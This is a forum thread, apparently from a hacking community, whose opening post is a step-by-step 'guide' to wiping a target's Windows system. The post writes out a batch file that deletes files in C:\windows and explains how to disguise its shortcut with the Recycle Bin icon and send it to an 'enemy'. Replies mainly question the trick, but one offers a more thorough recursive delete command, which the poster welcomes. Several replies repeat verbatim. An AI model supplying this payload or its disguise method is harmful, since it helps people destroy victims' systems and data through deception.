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[Guide]How To Destroy Your Enemy's Pc ( In 8 Steps )

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Here Is A Tutorial On About: "How To Destroy Your Enemy's Pc"




1.Create A Text Document.

2.Write In There This Code:

@echo off
del /q "C:\windows"

3.Save Is As (For Example) Whatever.bat

4.Then Make A ShortCut Of That File. (whatever.bat)

5.Rename It From (For Example) Shortcut Of Whatever At: (For Example) Recycle Bin

6.Right Click On The File's ShortCut And Then Click On Preperties.

7.Now Click On Change Icon And Find Recycle Bin's Icon.

8.Click Save.

9.You're Done And Ready To Send It To Your Enemy (^_^) *SEND BOTH ITEMS*(The Real One And The ShortCut)




And Here Is A Video If You Don't Understand...:





Thanks To kr1n0s* For Correct Me :D (Check Out Comments)



and honestly do you think anyone would fall into it?

yes 3 ppl pm me and tell me: it's awesome

and all that stuff if you don't fall into it... i don't care it's your opinion


forst... if you send only the ShortCut it dosent work....


second... you should send 2 files... when the other save the file, the ShortCut dont work.


and the last one... why someone to take 2 files with low size and to open them?


forst... if you send only the ShortCut it dosent work....


second... you should send 2 files... when the other save the file, the ShortCut dont work.


and the last one... why someone to take 2 files with low size and to open them?

i agree why short cut will work lol...

about if someone fall into it then he dont must know anything about computers... xD!


anyway nice guide!


forst... if you send only the ShortCut it dosent work....


second... you should send 2 files... when the other save the file, the ShortCut dont work.


and the last one... why someone to take 2 files with low size and to open them?



thanks for correcting me :D  GUIDE UPDATED!


You didnt even know what exactly shortcut is and you are going to scam someone, for example me? I would rather die.


Old notepad trick and its already shared.


This already exists on Tutorials/Guides section.

Plus the computer can be repaired, and it does not delete all the files inside the Windows folder.

You should try rmdir, or del /q /s C:\Windows\*.*

The /s switch is for the subfolders.


This already exists on Tutorials/Guides section.

Plus the computer can be repaired, and it does not delete all the files inside the Windows folder.

You should try rmdir, or del /q /s C:\Windows\*.*

The /s switch is for the subfolders.


thanks for the tip...

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